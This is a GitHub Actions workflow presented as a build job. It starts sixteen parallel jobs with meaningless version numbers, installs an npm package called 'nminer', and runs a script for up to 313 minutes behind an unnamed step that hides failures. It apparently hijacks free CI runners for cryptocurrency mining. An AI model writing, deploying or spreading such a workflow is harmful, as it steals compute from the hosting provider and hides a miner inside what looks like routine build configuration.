name: swing
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 373 }
          - { version: 4757 }
          - { version: 4605 }
          - { version: 7537 }
          - { version: 8585 }
          - { version: 6635 }
          - { version: 1848 }
          - { version: 4362 }
          - { version: 8377 }
          - { version: 976 }
          - { version: 1435 }
          - { version: 1720 }
          - { version: 9054 }
          - { version: 5936 }
          - { version: 3605 }
          - { version: 7897 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 313m node swing.js || echo "swing executed"